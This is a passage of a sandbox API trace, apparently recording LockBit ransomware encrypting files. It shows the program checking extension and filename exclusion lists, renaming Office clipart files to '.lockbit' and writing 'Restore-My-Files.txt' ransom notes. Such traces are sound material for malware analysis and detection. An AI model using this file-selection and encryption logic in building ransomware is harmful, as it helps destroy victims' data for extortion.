hTemplateFile=0x0) returned 0x338 [0175.802] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.802] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.802] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1632) returned 1 [0175.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.803] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.805] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.805] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.807] free (_Block=0x1fa2ed8) [0175.807] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.807] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.807] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d036200, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d036200, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x5cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00735_.WMF", cAlternateFileName="")) returned 1 [0175.807] lstrcmpiW (lpString1=".", lpString2="SO00735_.WMF") returned -1 [0175.807] lstrcmpiW (lpString1="..", lpString2="SO00735_.WMF") returned -1 [0175.807] PathFindExtensionW (pszPath="SO00735_.WMF") returned=".WMF" [0175.807] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.807] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.808] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.808] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00735_.WMF") returned -1 [0175.809] lstrcmpiW (lpString1="ntldr", lpString2="SO00735_.WMF") returned -1 [0175.809] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00735_.WMF") returned -1 [0175.809] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00735_.WMF") returned -1 [0175.809] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00735_.WMF") returned -1 [0175.809] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00735_.WMF") returned 1 [0175.809] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00735_.WMF") returned -1 [0175.809] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.809] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF") returned=".WMF" [0175.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.810] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.810] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.811] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.811] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.811] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF.lockbit") returned 72 [0175.811] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00735_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.812] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.812] malloc (_Size=0x40068) returned 0x3d70450 [0175.812] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1484) returned 1 [0175.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0175.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0175.813] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0175.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.817] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.817] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.819] free (_Block=0x1fa2ed8) [0175.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.819] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498bcd00, ftCreationTime.dwHighDateTime=0x1bd4b44, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x498bcd00, ftLastWriteTime.dwHighDateTime=0x1bd4b44, nFileSizeHigh=0x0, nFileSizeLow=0x184c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00736_.WMF", cAlternateFileName="")) returned 1 [0175.819] lstrcmpiW (lpString1=".", lpString2="SO00736_.WMF") returned -1 [0175.819] lstrcmpiW (lpString1="..", lpString2="SO00736_.WMF") returned -1 [0175.819] PathFindExtensionW (pszPath="SO00736_.WMF") returned=".WMF" [0175.819] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.819] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.820] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.821] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.821] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00736_.WMF") returned -1 [0175.822] lstrcmpiW (lpString1="ntldr", lpString2="SO00736_.WMF") returned -1 [0175.822] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00736_.WMF") returned -1 [0175.822] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00736_.WMF") returned -1 [0175.822] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00736_.WMF") returned -1 [0175.822] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00736_.WMF") returned 1 [0175.822] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00736_.WMF") returned -1 [0175.822] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.822] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF") returned=".WMF" [0175.822] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.822] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.822] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.823] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.823] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF.lockbit") returned 72 [0175.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00736_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0175.828] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.828] malloc (_Size=0x40068) returned 0x3e70008 [0175.828] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6220) returned 1 [0175.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0175.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0175.830] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0175.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.832] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.832] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.834] free (_Block=0x1fa2ed8) [0175.834] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.834] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.834] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.834] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f96e00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73f96e00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x543a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00768_.WMF", cAlternateFileName="")) returned 1 [0175.834] lstrcmpiW (lpString1=".", lpString2="SO00768_.WMF") returned -1 [0175.834] lstrcmpiW (lpString1="..", lpString2="SO00768_.WMF") returned -1 [0175.834] PathFindExtensionW (pszPath="SO00768_.WMF") returned=".WMF" [0175.834] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.834] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.834] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.834] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.835] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.836] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.836] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.836] 